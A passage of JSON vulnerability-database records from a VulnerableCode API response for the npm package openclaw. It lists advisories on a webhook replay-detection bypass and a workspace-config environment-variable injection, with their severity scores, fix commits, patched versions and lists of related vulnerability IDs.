                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41380",
                "GHSA-p4x4-2r7f-wjxg"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jbwa-scg3-efeq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89491?format=api",
            "vulnerability_id": "VCID-jdqk-kv8u-xqa9",
            "summary": "OpenClaw: Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n## Summary\nTelnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: In shipped v2026.3.28, replay hashing treated equivalent Base64 and Base64URL encodings of the same Telnyx signature as distinct requests, so replay detection missed a re-encoded duplicate; signature verification still held, so severity is lowered to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ad77666054651c1fd77b1dc60fd6a8db6600a29a` — 2026-03-30T20:01:43+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41351",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1326",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13224",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13264",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41351"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37v6-fxx8-xjmx"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41351",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41351"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-37v6-fxx8-xjmx",
                    "reference_id": "GHSA-37v6-fxx8-xjmx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-37v6-fxx8-xjmx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41351",
                "GHSA-37v6-fxx8-xjmx"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jdqk-kv8u-xqa9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89392?format=api",
            "vulnerability_id": "VCID-jhah-j2td-t3dp",
            "summary": "OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n## Summary\nIncomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Confirmed env injection from a malicious workspace config in the shipped CLI backend runner; fixed by sanitizing the backend env before spawn, with the fix shipped in v2026.3.24, so the advisory stays open until published.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.23-2`\n- Patched versions: `>= 2026.3.24`\n- First stable tag containing the fix: `v2026.3.24`\n\n## Fix Commit(s)\n- `c2fb7f1948c3226732a630256b5179a60664ec24` — 2026-03-24T12:58:10-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.24`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @YLChen-007 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41384",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03582",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03589",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03575",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41384"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41384",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41384"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vfw7-6rhc-6xxg",
                    "reference_id": "GHSA-vfw7-6rhc-6xxg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vfw7-6rhc-6xxg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
